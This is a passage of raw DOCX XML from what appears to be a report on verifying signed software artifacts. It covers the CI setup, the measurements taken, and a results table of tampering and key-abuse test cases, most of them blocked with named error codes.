      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: a GitHub Actions workflow runs the tests, the attack simulation, the full pipeline and a must-block check on every push.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Measurements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: verification time, detection rate and false-acceptance rate over 1,000 random mutations, and primitive cost versus artifact size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.2 Test Cases and Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Test case results (generated from the pytest run)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="793"/>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="2494"/>
        <w:gridCol w:w="2494"/>
        <w:gridCol w:w="680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="794"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Test case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack / condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Actual result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Status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TC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Valid signed artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS / DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS / DEPLOY</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TC02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>One malicious line added (Codecov-style)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</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TC02b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Single bit flipped in artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</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TC03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Corrupted manifest signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</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TC03b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker claims vendor key ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</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TC04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wrong pinned public (root) key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</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TC04b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signed with attacker's own key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - UNAUTHORIZED_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - UNAUTHORIZED_KEY</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TC05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signing key revoked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REVOKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REVOKED</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TC05b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stolen key signs payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - POLICY_VIOLATION, then REVOKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - POLICY_VIOLATION, then REVOKED</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TC06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manifest SHA-256 replaced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE</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TC06b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manifest field removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_MANIFEST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_MANIFEST</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TC06c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Provenance builder changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE + INVALID_PROVENANCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_SIGNATURE + INVALID_PROVENANCE</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TC07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Replay of older version (rollback)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REPLAY_BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REPLAY_BLOCKED</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TC07b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
